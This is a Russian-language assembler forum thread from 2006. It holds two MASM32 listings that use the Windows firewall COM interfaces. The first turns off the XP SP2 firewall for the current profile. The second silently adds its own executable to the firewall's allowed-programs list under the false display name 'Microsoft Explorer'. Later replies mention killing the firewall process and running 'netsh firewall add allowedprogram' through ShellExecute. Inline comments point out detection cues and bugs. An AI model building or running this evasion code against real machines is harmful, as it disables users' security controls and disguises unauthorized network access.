WinXPSP2Firewall Disabled

Тема в разделе "WASM.ENGLISH", создана пользователем Guest, 10 фев 2006.

  1. Guest

    .586

    .model flat, stdcall

    option casemap :none



    include \masm32\include\windows.inc

    include \masm32\include\user32.inc

    include \masm32\include\kernel32.inc

    include \masm32\include\ole32.inc



    includelib \masm32\lib\ole32.lib

    includelib \masm32\lib\user32.lib

    includelib \masm32\lib\kernel32.lib

    include oaidl.inc



    ; Prototypes for the two IDispatch helper procs defined later in this
    ; listing. Each takes three dword arguments: an interface pointer, a
    ; pointer to a wide-character member name, and a pointer to a VARIANT.
    PutProperty proto :dword, :dword, :dword
    GetProperty proto :dword, :dword, :dword





    ; unicode page, string, zero
    ; Assembles <string> as two-byte characters: for every character c of the
    ; string it emits the byte 'c' followed by the byte <page>. When the
    ; <zero> argument is present it appends "dw zero"; the call sites in this
    ; listing pass 0 for both, giving a wide string with a terminating null word.
    unicode macro page,string,zero
    irpc c,<string>
    db '&c', page
    endm
    ifnb <zero>
    dw zero
    endif
    endm



    .data
    ; All-zero GUID, passed as the riid argument of the IDispatch calls.
    IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>
    ; {304CE942-6E39-40D8-943A-B913C40C9CD4}: class ID given to CoCreateInstance
    ; in start (the firewall manager object, per the symbol name).
    CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>
    ; {F7898AF5-CAC4-4632-A2EC-DA06E5111AF2}: interface ID requested for that object.
    ; Defender note: these GUID bytes, together with the wide member-name
    ; strings in .code, are fixed values that static analysis can match on to
    ; find binaries driving the firewall configuration objects.
    IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>
    ; VARIANT that start fills with VT_BOOL / VARIANT_FALSE before the property write.
    vVal VARIANT <>
    ; VARIANT that receives the result of each GetProperty call in start.
    VarResult VARIANT <>
    ; Interface pointers, written by start; uninitialised storage until then.
    fwMgr dd ?
    fwPolicy dd ?
    m_pFireWallProfile dd ?



    .code
    ; Null-terminated wide-character member names, assembled into the code
    ; section. start passes their addresses to GetProperty / PutProperty,
    ; which resolve them with IDispatch::GetIDsOfNames.
    wszLocalPolicy:
    unicode 0, <LocalPolicy>,0
    wszCurrentProfile:
    unicode 0, <CurrentProfile>,0
    wszFirewallEnabled:
    unicode 0, <FirewallEnabled>,0

    ; Program entry point.
    ; Creates the NetFwMgr COM object, reads its LocalPolicy property, then
    ; that object's CurrentProfile property, and writes
    ; FirewallEnabled = VARIANT_FALSE on the profile before releasing the
    ; interface pointers and exiting. No return value is checked in this run.
    ; Defender note: the net effect is that an ordinary user-mode process
    ; switches the firewall off for the current profile. The firewall API is
    ; expected to refuse this write without administrative rights (confirm for
    ; the OS build in question), and the change is visible to anything that
    ; audits firewall policy or reads the same FirewallEnabled property.
    start:
    ; NOTE(review): HRESULT ignored; no OleUninitialize appears in this listing.
    invoke OleInitialize, 0
    ; In-process instance of CLSID_NetFwMgr; the interface pointer is stored in fwMgr.
    ; NOTE(review): HRESULT ignored - on failure the code continues with
    ; whatever fwMgr holds.
    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr
    ; VarResult <- fwMgr.LocalPolicy
    invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult
    ; The returned interface pointer is read through the ppdispVal member
    ; (presumably the same storage as pdispVal in the VARIANT union - confirm
    ; against oaidl.inc).
    mov eax, VarResult.ppdispVal
    mov fwPolicy, eax
    ; VarResult <- LocalPolicy.CurrentProfile
    invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult
    mov eax, VarResult.ppdispVal
    ; NOTE(review): this store replaces the LocalPolicy pointer with the
    ; profile pointer, so the policy object is never released and the profile
    ; pointer is released twice at the end of this run.
    mov fwPolicy, eax
    mov m_pFireWallProfile, eax
    ; vVal = { VT_BOOL, VARIANT_FALSE }: the value written to FirewallEnabled.
    mov vVal.vt, VT_BOOL
    mov vVal.boolVal, VARIANT_FALSE
    ; profile.FirewallEnabled = FALSE; the HRESULT left in eax is not inspected.
    invoke PutProperty, m_pFireWallProfile, offset wszFirewallEnabled, addr vVal
    ; coinvoke is a macro from an include that is not part of this listing;
    ; here it calls Release through each pointer's IDispatch vtable.
    coinvoke m_pFireWallProfile, IDispatch, Release
    coinvoke fwPolicy, IDispatch, Release
    coinvoke fwMgr, IDispatch, Release
    invoke ExitProcess, 0



    ;###############################################################



    ; PutProperty(_This, pUniName, pAgmnt)
    ; Late-bound property write through IDispatch.
    ; In:  _This    = interface pointer used for the IDispatch calls
    ;      pUniName = pointer to the null-terminated wide member name
    ;      pAgmnt   = pointer to the VARIANT holding the new value
    ; Out: eax = 80004003h (E_POINTER) when _This or pAgmnt is zero; the
    ;            HRESULT of GetIDsOfNames when the name lookup fails; otherwise
    ;            the HRESULT of the last Invoke that ran (0 if none ran).
    ; Locals: pArm is the DISPPARAMS passed to Invoke, var_8 holds the single
    ;         named-argument DISPID, dispIdMember receives the resolved DISPID.
    PutProperty proc _This:dword, pUniName:dword, pAgmnt:dword

    LOCAL pArm : DISPPARAMS
    LOCAL var_8 : dword
    LOCAL dispIdMember : dword

    ; Default return value for the null-argument case.
    mov eax, 80004003h
    .if _This != 0 && pAgmnt != 0
    ; 0FFFFFFFDh is -3, the DISPID_PROPERTYPUT value a property put passes as
    ; its one named argument.
    mov var_8, 0FFFFFFFDh
    ; DISPPARAMS: one argument (the caller's VARIANT), one named argument.
    mov eax, pAgmnt
    mov pArm.rgvarg, eax
    lea eax, var_8
    mov pArm.rgdispidNamedArgs, eax
    mov pArm.cArgs, 1
    mov pArm.cNamedArgs, 1
    ; addr pUniName is the address of the parameter slot, i.e. a one-element
    ; array of name pointers.
    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
    .if eax == 0
    ; cx = vt field of the caller's VARIANT; eax is cleared so the second
    ; .if below only fires when the first Invoke returned nonzero.
    mov ecx, pAgmnt
    mov cx, (VARIANT ptr [ecx]).vt
    xor eax, eax
    ; NOTE(review): the two negated tests make this condition true for every
    ; vt that does not carry both VT_ARRAY and VT_BYREF, so the by-reference
    ; put is tried first in practically all cases. When the condition is false,
    ; eax stays 0, no Invoke is issued and the proc still reports success.
    ; Confirm whether (cx & VT_ARRAY) || (cx & VT_BYREF) was intended.
    .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)
    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0
    .endif
    ; Fallback: plain property put when the previous step left a nonzero value in eax.
    .if eax != 0
    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0
    .endif
    .endif
    .endif
    ret

    PutProperty endp



    ;###############################################################



    ;---------------------------------------------------------------
    ; GetProperty(_This, pUniName, pOutArg)
    ; Late-bound property read through IDispatch (32-bit, stdcall).
    ; In:  _This    = interface pointer; zero is rejected
    ;      pUniName = pointer to the null-terminated wide member name
    ;      pOutArg  = pointer to the VARIANT that receives the value
    ; Out: eax = 80004003h when _This is zero, otherwise the HRESULT of
    ;            GetIDsOfNames, or of Invoke when the lookup returned 0
    ;---------------------------------------------------------------
    GetProperty proc _This:dword, pUniName:dword, pOutArg:dword

        LOCAL pArm : DISPPARAMS
        LOCAL dispIdMember : dword

        ; A property read passes no arguments: empty DISPPARAMS.
        xor     eax, eax
        mov     pArm.cNamedArgs, eax
        mov     pArm.cArgs, eax
        mov     pArm.rgdispidNamedArgs, eax
        mov     pArm.rgvarg, eax

        mov     eax, 80004003h              ; returned as-is when _This is zero
        cmp     _This, 0
        je      get_done

        ; addr pUniName is the address of the parameter slot, i.e. a
        ; one-element array of name pointers.
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        test    eax, eax
        jnz     get_done                    ; lookup failed: hand its HRESULT back

        coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0

    get_done:
        ret

    GetProperty endp



    ;###############################################################



    end start
     
  2. Guest

    WinXPSP2Firewall - вырубается гораздо меньшим кодом и без ком-объектов
     
  3. Guest

    Покажи.
     
  4. Oleg_SK

    Corleone

    Как говорится: пример в студию!:)
     
  5. Bill_Prisoner

    Объясните, на чём основан приведённый код?
     
  6. Guest



    netfw.idl
     
  7. Bill_Prisoner



    Что это?
     
  8. Guest

    The Interface Definition Language (IDL) File.



    An IDL file contains one or more interface definitions. Each interface definition is composed of an interface header and an interface body. The interface header is demarcated by square brackets. The interface body is contained in curly brackets. This is illustrated in the following example interface:
     
  9. Guest

    Corleone



    "нимдеть - это не камушки ворочать"

    narodnaja mudrost
     
  10. Guest

    Corleone



    Сделай без COM-объектов вот это.

    Если WinXPSP2Firewall включён, то добавляет себя в список программ.



    ;------------------------------------------



    .586

    .model flat, stdcall

    option casemap :none



    include \masm32\include\windows.inc

    include \masm32\include\user32.inc

    include \masm32\include\kernel32.inc

    include \masm32\include\ole32.inc

    include \masm32\include\Oleaut32.inc



    includelib \masm32\lib\ole32.lib

    includelib \masm32\lib\user32.lib

    includelib \masm32\lib\kernel32.lib

    includelib \masm32\lib\Oleaut32.lib

    include oaidl.inc



    ; Prototypes for the procs of this listing.
    ; NOTE(review): TurnOffWindowsFirewall and TurnOnWindowsFirewall are
    ; declared here but no body for them appears in the listing.
    Initialize proto :dword
    Uninitialize proto :dword
    TurnOffWindowsFirewall proto
    TurnOnWindowsFirewall proto
    AddApplication proto :dword, :dword, :dword
    IsWindowsFirewallOn proto :dword, :dword
    PutProperty proto :dword, :dword, :dword
    GetProperty proto :dword, :dword, :dword
    CallMethod proto :dword, :dword, :dword, :dword, :dword





    ; unicode page, string, zero
    ; Assembles <string> as two-byte characters: for every character c of the
    ; string it emits the byte 'c' followed by the byte <page>. When the
    ; <zero> argument is present it appends "dw zero"; the call sites in this
    ; listing pass 0 for both, giving a wide string with a terminating null word.
    unicode macro page,string,zero
    irpc c,<string>
    db '&c', page
    endm
    ifnb <zero>
    dw zero
    endif
    endm



    .data
    ; All-zero GUID, passed as the riid argument of the IDispatch calls.
    IID_NULL GUID <0, 0, 0, <0, 0, 0, 0, 0, 0, 0, 0>>
    ; {EC9846B3-2762-4A6B-A214-6ACB603462D2}: class ID that AddApplication
    ; gives to CoCreateInstance for the new authorized-application entry.
    CLSID_NetFwAuthorizedApplication GUID <0EC9846B3h, 02762h, 04A6Bh, <0A2h, 014h, 06Ah, 0CBh, 060h, 034h, 062h, 0D2h>>
    ; {B5E64FFA-C2C5-444E-A301-FB5E00018050}: interface ID requested for that entry.
    IID_INetFwAuthorizedApplication GUID <0B5E64FFAh, 0C2C5h, 0444Eh, <0A3h, 001h, 0FBh, 05Eh, 000h, 001h, 080h, 050h>>
    ; {304CE942-6E39-40D8-943A-B913C40C9CD4}: class ID that Initialize gives to
    ; CoCreateInstance (the firewall manager object, per the symbol name).
    CLSID_NetFwMgr GUID <0304CE942h, 06E39h, 040D8h, <094h, 03Ah, 0B9h, 013h, 0C4h, 00Ch, 09Ch, 0D4h>>
    ; {F7898AF5-CAC4-4632-A2EC-DA06E5111AF2}: interface ID requested for the manager.
    ; Defender note: these GUID bytes are fixed values that static analysis can
    ; match on to find binaries that add firewall exceptions programmatically.
    IID_INetFwMgr GUID <0F7898AF5h, 0CAC4h, 04632h, <0A2h, 0ECh, 0DAh, 006h, 0E5h, 011h, 01Ah, 0F2h>>

    .code
    ; Null-terminated wide-character member names, assembled into the code
    ; section and resolved at run time with IDispatch::GetIDsOfNames.
    wszLocalPolicy:
    unicode 0, <LocalPolicy>,0
    wszCurrentProfile:
    unicode 0, <CurrentProfile>,0
    wszFirewallEnabled:
    unicode 0, <FirewallEnabled>,0
    wszName:
    unicode 0, <Name>,0
    wszAdd:
    unicode 0, <Add>,0
    ; NOTE(review): wszEnabled is not referenced by any proc in this listing.
    wszEnabled:
    unicode 0, <Enabled>,0
    wszAuthorizedApplications:
    unicode 0, <AuthorizedApplications>,0
    wszProcessImageFileName:
    unicode 0, <ProcessImageFileName>,0
    ; Display name that WinFaerFix passes to AddApplication for the new entry.
    ; Defender note: "Microsoft Explorer" does not describe the program that
    ; registers itself here; an allowed-programs entry whose display name and
    ; image path disagree deserves a closer look when exception lists are reviewed.
    wszFireWallTest:
    unicode 0, <Microsoft Explorer>,0

    ; Program entry point: runs WinFaerFix once, then exits with code 0
    ; whatever WinFaerFix left in eax.
    start:
    call WinFaerFix
    invoke ExitProcess, 0



    ;###############################################################



    ; WinFaerFix()
    ; Obtains the current firewall profile and, only when the profile reports
    ; the firewall as enabled, registers this executable's own path in the
    ; profile's authorized-applications list under the name at wszFireWallTest.
    ; Out: eax = whatever the last call left there (not set deliberately).
    ; Locals: WfProfil = profile interface pointer from Initialize,
    ;         wszMofd  = 500-byte buffer for the module path,
    ;         bWfon    = firewall state written by IsWindowsFirewallOn.
    ; Defender note: the result is a new allowed-program exception created by
    ; the program for itself; auditing additions to the exception list, and
    ; comparing each entry's name with the file it points to, exposes it.
    WinFaerFix proc uses edi esi ebx

    LOCAL WfProfil : dword
    LOCAL wszMofd[500] : byte
    LOCAL bWfon : dword

    ; NOTE(review): HRESULT ignored; no OleUninitialize appears in this listing.
    invoke OleInitialize, 0
    invoke Initialize, addr WfProfil
    .if eax == 0
    invoke IsWindowsFirewallOn, WfProfil, addr bWfon
    ; bWfon is only written when IsWindowsFirewallOn returned 0, which the
    ; first half of this condition guarantees before it is read.
    .if eax == 0 && bWfon == VARIANT_TRUE
    ; NOTE(review): the size argument of GetModuleFileNameW counts characters,
    ; so 500 describes 1000 bytes while wszMofd is 500 bytes; a long module
    ; path can be written past the local buffer. The return value is not checked.
    invoke GetModuleFileNameW, 0, addr wszMofd, 500
    ; The HRESULT of AddApplication is discarded.
    invoke AddApplication, WfProfil, addr wszMofd, addr wszFireWallTest
    .endif
    ; Releases the profile pointer obtained by Initialize.
    invoke Uninitialize, WfProfil
    .endif
    ret

    WinFaerFix endp



    ;##########################################################



    ;---------------------------------------------------------------
    ; IsWindowsFirewallOn(wfprf, wfbol)
    ; Reads the FirewallEnabled property of a firewall profile.
    ; In:  wfprf = profile interface pointer
    ;      wfbol = pointer to the dword that receives the state
    ; Out: eax = HRESULT returned by GetProperty; only when it is 0 is
    ;      *wfbol written, with the 16-bit boolVal zero-extended to 32 bits.
    ; NOTE(review): the caller compares the stored dword with VARIANT_TRUE;
    ; whether that can match depends on how windows.inc defines the constant
    ; (a zero-extended 0FFFFh is not equal to a 32-bit -1) - confirm.
    ;---------------------------------------------------------------
    IsWindowsFirewallOn proc uses edi esi ebx wfprf:dword, wfbol:dword

        LOCAL VarResult : VARIANT

        invoke  GetProperty, wfprf, offset wszFirewallEnabled, addr VarResult
        test    eax, eax
        jnz     state_done                  ; read failed: leave *wfbol untouched

        movzx   edx, VarResult.boolVal
        mov     ecx, wfbol
        mov     [ecx], edx

    state_done:
        ret

    IsWindowsFirewallOn endp



    ;##########################################################



    ; AddApplication(wfprf, lpszProcessImageFileName, lpszRegisterName)
    ; Creates an authorized-application object, sets its ProcessImageFileName
    ; and Name properties, and passes it to the Add method of the profile's
    ; AuthorizedApplications collection.
    ; In:  wfprf                    = firewall profile interface pointer
    ;      lpszProcessImageFileName = wide string: path of the executable
    ;      lpszRegisterName         = wide string: display name for the entry
    ; Out: eax = HRESULT of the last step that ran (0 when every step returned 0)
    ; Defender note: a successful call leaves a new allowed-program exception in
    ; the firewall profile; that list is the place to audit for unexpected entries.
    ; NOTE(review): bAppEnable is declared but never referenced in this proc.
    AddApplication proc uses edi esi ebx wfprf:dword, lpszProcessImageFileName:dword, lpszRegisterName:dword

    LOCAL bAppEnable : dword
    LOCAL VarResult : VARIANT
    LOCAL bstrProcFileName : dword
    LOCAL vVal : VARIANT
    LOCAL bstrRegisterName : dword
    LOCAL pFWApp : dword
    LOCAL pFWApps : dword
    LOCAL result : dword

    ; VarResult <- profile.AuthorizedApplications (the collection object).
    invoke GetProperty, wfprf, offset wszAuthorizedApplications, addr VarResult
    mov result, eax
    .if eax == 0
    ; Collection pointer, read through the ppdispVal member (presumably the
    ; same storage as pdispVal in the VARIANT union - confirm against oaidl.inc).
    mov eax, VarResult.ppdispVal
    mov pFWApps, eax
    ; New in-process authorized-application object; pointer stored in pFWApp.
    invoke CoCreateInstance, addr CLSID_NetFwAuthorizedApplication, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwAuthorizedApplication, addr pFWApp
    mov result, eax
    ; NOTE(review): both Release calls sit inside this .if, so pFWApps is not
    ; released when CoCreateInstance fails.
    .if eax == 0
    ; NOTE(review): the BSTR returned by SysAllocString is not checked for zero.
    invoke SysAllocString, lpszProcessImageFileName
    mov bstrProcFileName, eax
    mov eax, bstrProcFileName
    ; vVal = { VT_BSTR, path }; the pointer is stored through the pbstrVal member.
    mov vVal.vt, VT_BSTR
    mov vVal.pbstrVal, eax
    invoke PutProperty, pFWApp, offset wszProcessImageFileName, addr vVal
    mov result, eax
    .if eax == 0
    ; Same sequence for the display name.
    invoke SysAllocString, lpszRegisterName
    mov bstrRegisterName, eax
    mov eax, bstrRegisterName
    mov vVal.vt, VT_BSTR
    mov vVal.pbstrVal, eax
    invoke PutProperty, pFWApp, offset wszName, addr vVal
    mov result, eax
    .if eax == 0
    ; vVal = { VT_DISPATCH, pFWApp }: the single argument of collection.Add.
    mov vVal.vt, VT_DISPATCH
    mov eax, pFWApp
    mov vVal.pdispVal, eax
    invoke CallMethod, pFWApps, offset wszAdd, addr VarResult, 1, addr vVal
    mov result, eax
    .endif
    ; Each BSTR is freed at the nesting level where it was allocated.
    invoke SysFreeString, bstrRegisterName
    .endif
    invoke SysFreeString, bstrProcFileName
    .if( pFWApp )
    coinvoke pFWApp, IDispatch, Release
    .endif
    .if( pFWApps )
    coinvoke pFWApps, IDispatch, Release
    .endif
    .endif
    .endif
    ; result carries the HRESULT of the last step that ran.
    mov eax, result
    ret

    AddApplication endp



    ;##########################################################



    ; Uninitialize(wfprf)
    ; Calls Release on the profile interface pointer through the coinvoke
    ; macro (defined in an include that is not part of this listing).
    ; In:  wfprf = interface pointer; it is not checked for zero here
    ; Out: eax = whatever the Release call returns
    Uninitialize proc uses edi esi ebx wfprf:dword

    coinvoke wfprf, IDispatch, Release
    ret

    Uninitialize endp



    ;###############################################################



    ; Initialize(pwfprf)
    ; Creates the firewall manager object, reads LocalPolicy from it and
    ; CurrentProfile from the policy, and stores the profile interface pointer
    ; at *pwfprf.
    ; In:  pwfprf = pointer to the dword that receives the profile pointer
    ; Out: eax = 0 when all three steps returned 0, otherwise the HRESULT of
    ;            the first step that did not; *pwfprf is written only on success
    Initialize proc uses edi esi ebx pwfprf:dword

    LOCAL fwPolicy : dword
    LOCAL fwMgr : dword
    LOCAL VarResult : VARIANT
    LOCAL result : dword

    invoke CoCreateInstance, addr CLSID_NetFwMgr, 0, CLSCTX_INPROC_SERVER, addr IID_INetFwMgr, addr fwMgr
    mov result, eax
    .if eax == 0
    ; VarResult <- fwMgr.LocalPolicy
    invoke GetProperty, fwMgr, offset wszLocalPolicy, addr VarResult
    mov result, eax
    .if eax == 0
    ; Policy pointer, read through the ppdispVal member (presumably the same
    ; storage as pdispVal in the VARIANT union - confirm against oaidl.inc).
    mov eax, VarResult.ppdispVal
    mov fwPolicy, eax
    ; VarResult <- LocalPolicy.CurrentProfile
    invoke GetProperty, fwPolicy, offset wszCurrentProfile, addr VarResult
    mov result, eax
    ; NOTE(review): the Release of fwPolicy sits inside this .if, so the policy
    ; object is not released when reading CurrentProfile fails.
    .if eax == 0
    ; Hand the profile pointer to the caller, who releases it via Uninitialize.
    mov eax, VarResult.ppdispVal
    mov ecx, pwfprf
    mov [ecx], eax
    mov result, 0
    coinvoke fwPolicy, IDispatch, Release
    .endif
    .endif
    ; The manager is released on every path on which it was created.
    coinvoke fwMgr, IDispatch, Release
    .endif
    mov eax, result
    ret

    Initialize endp



    ;###############################################################



    ; PutProperty(_This, pUniName, pAgmnt)
    ; Late-bound property write through IDispatch.
    ; In:  _This    = interface pointer used for the IDispatch calls
    ;      pUniName = pointer to the null-terminated wide member name
    ;      pAgmnt   = pointer to the VARIANT holding the new value
    ; Out: eax = 80004003h (E_POINTER) when _This or pAgmnt is zero; the
    ;            HRESULT of GetIDsOfNames when the name lookup fails; otherwise
    ;            the HRESULT of the last Invoke that ran (0 if none ran).
    ; Locals: pArm is the DISPPARAMS passed to Invoke, NamArg holds the single
    ;         named-argument DISPID, dispIdMember receives the resolved DISPID.
    PutProperty proc uses edi esi ebx _This:dword, pUniName:dword, pAgmnt:dword

    LOCAL pArm : DISPPARAMS
    LOCAL NamArg : dword
    LOCAL dispIdMember : dword

    ; Default return value for the null-argument case.
    mov eax, 80004003h
    .if _This != 0 && pAgmnt != 0
    ; 0FFFFFFFDh is -3, the DISPID_PROPERTYPUT value a property put passes as
    ; its one named argument.
    mov NamArg, 0FFFFFFFDh
    ; DISPPARAMS: one argument (the caller's VARIANT), one named argument.
    mov eax, pAgmnt
    mov pArm.rgvarg, eax
    lea eax, NamArg
    mov pArm.rgdispidNamedArgs, eax
    mov pArm.cArgs, 1
    mov pArm.cNamedArgs, 1
    ; addr pUniName is the address of the parameter slot, i.e. a one-element
    ; array of name pointers.
    coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
    .if eax == 0
    ; cx = vt field of the caller's VARIANT; eax is cleared so the second
    ; .if below only fires when the first Invoke returned nonzero.
    mov ecx, pAgmnt
    mov cx, (VARIANT ptr [ecx]).vt
    xor eax, eax
    ; NOTE(review): the two negated tests make this condition true for every
    ; vt that does not carry both VT_ARRAY and VT_BYREF, so the by-reference
    ; put is tried first in practically all cases. When the condition is false,
    ; eax stays 0, no Invoke is issued and the proc still reports success.
    ; Confirm whether (cx & VT_ARRAY) || (cx & VT_BYREF) was intended.
    .if cx == VT_UNKNOWN || cx == VT_DISPATCH || !(cx & VT_ARRAY) || !(cx & VT_BYREF)
    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, 0, 0, 0
    .endif
    ; Fallback: plain property put when the previous step left a nonzero value in eax.
    .if eax != 0
    coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUT, addr pArm, 0, 0, 0
    .endif
    .endif
    .endif
    ret

    PutProperty endp



    ;###############################################################



    ;---------------------------------------------------------------
    ; GetProperty(_This, pUniName, pOutArg)
    ; Late-bound property read through IDispatch (32-bit, stdcall).
    ; In:  _This    = interface pointer; zero is rejected
    ;      pUniName = pointer to the null-terminated wide member name
    ;      pOutArg  = pointer to the VARIANT that receives the value;
    ;                 zero is rejected
    ; Out: eax = 80004003h when _This or pOutArg is zero, otherwise the
    ;            HRESULT of GetIDsOfNames, or of Invoke when the lookup
    ;            returned 0
    ;---------------------------------------------------------------
    GetProperty proc uses edi esi ebx _This:dword, pUniName:dword, pOutArg:dword

        LOCAL pArm : DISPPARAMS
        LOCAL dispIdMember : dword

        ; A property read passes no arguments: empty DISPPARAMS.
        xor     eax, eax
        mov     pArm.cNamedArgs, eax
        mov     pArm.cArgs, eax
        mov     pArm.rgdispidNamedArgs, eax
        mov     pArm.rgvarg, eax

        mov     eax, 80004003h              ; returned as-is for a zero pointer
        cmp     _This, 0
        je      get_done
        cmp     pOutArg, 0
        je      get_done

        ; addr pUniName is the address of the parameter slot, i.e. a
        ; one-element array of name pointers.
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr pUniName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        test    eax, eax
        jnz     get_done                    ; lookup failed: hand its HRESULT back

        coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYGET, addr pArm, pOutArg, 0, 0

    get_done:
        ret

    GetProperty endp



    ;###############################################################



    ;---------------------------------------------------------------
    ; CallMethod(_This, MetName, VarRes, numArg, pArgArray)
    ; Late-bound method call through IDispatch (32-bit, stdcall).
    ; In:  _This     = interface pointer; zero is rejected
    ;      MetName   = pointer to the null-terminated wide method name
    ;      VarRes    = pointer to the VARIANT for the result; zero is rejected
    ;      numArg    = number of VARIANTs at pArgArray
    ;      pArgArray = pointer to the argument VARIANT array
    ; Out: eax = 80004003h when _This or VarRes is zero, otherwise the
    ;            HRESULT of GetIDsOfNames or of the last Invoke that ran
    ;---------------------------------------------------------------
    CallMethod proc uses edi esi ebx _This:dword, MetName:dword, VarRes:dword, numArg:dword, pArgArray:dword

        LOCAL dispIdMember : dword
        LOCAL pArm : DISPPARAMS

        ; DISPPARAMS: the caller's positional arguments, no named arguments.
        mov     pArm.cNamedArgs, 0
        mov     pArm.rgdispidNamedArgs, 0
        mov     eax, numArg
        mov     pArm.cArgs, eax
        mov     eax, pArgArray
        mov     pArm.rgvarg, eax

        mov     eax, 80004003h              ; returned as-is for a zero pointer
        cmp     _This, 0
        je      call_done
        cmp     VarRes, 0
        je      call_done

        ; addr MetName is the address of the parameter slot, i.e. a
        ; one-element array of name pointers.
        coinvoke _This, IDispatch, GetIDsOfNames, addr IID_NULL, addr MetName, 1, LOCALE_USER_DEFAULT, addr dispIdMember
        test    eax, eax
        jnz     call_done                   ; lookup failed: hand its HRESULT back

        ; First attempt: plain method call.
        coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, addr pArm, VarRes, 0, 0
        test    eax, eax
        jz      call_done

        ; Nonzero result: one retry with the by-reference put flag added.
        coinvoke _This, IDispatch, Invoke, dispIdMember, addr IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD or DISPATCH_PROPERTYPUTREF, addr pArm, VarRes, 0, 0

    call_done:
        ret

    CallMethod endp



    ;##########################################################





    end start
     
  11. Guest

    Аноним



    Я не пойму сложности вопроса отключения стандартного фаера. Пример приводить не буду, т.к. кое-где сам юзаю, но лишь скажу, что без проверок на ошибки в асме он занимает 5 строк, никаких COM-объектов, драйверов и манипуляций с памятью не проводится, смотрите проще!
     
  12. Guest



    дело не в сложности, а в адекватности.



    На разговор - отвечаем разговором. На пример - примером.

    Если на пример отвечаем разговором - это и есть "нимдеть - это не камушки ворочать".





    типа прибить процесс это большой секрет
     
  13. dcskm4200

    Hey,Аноним

    ;---------------------------------------------------------

    IDispatch_ReleaseProto typedef proto

    IDispatch_Release typedef ptr IDispatch_ReleaseProto

    ;---------------------------------------------------------

    could it pass ML?
     
  14. Guest

  15. dcskm4200

    OK!

    Thanks
     
  16. slow

    Аноним

    А зачем убивать WinFw? Вполне можно использовать

    netsh firewall add allowedprogram <program>
     
  17. Guest

    У меня вообще XP нету:)
     
  18. slow

    Просто не надо возиться с COM, выполнил ShellExecute и всё

    У меня вооще XP нету:)

    завидую :))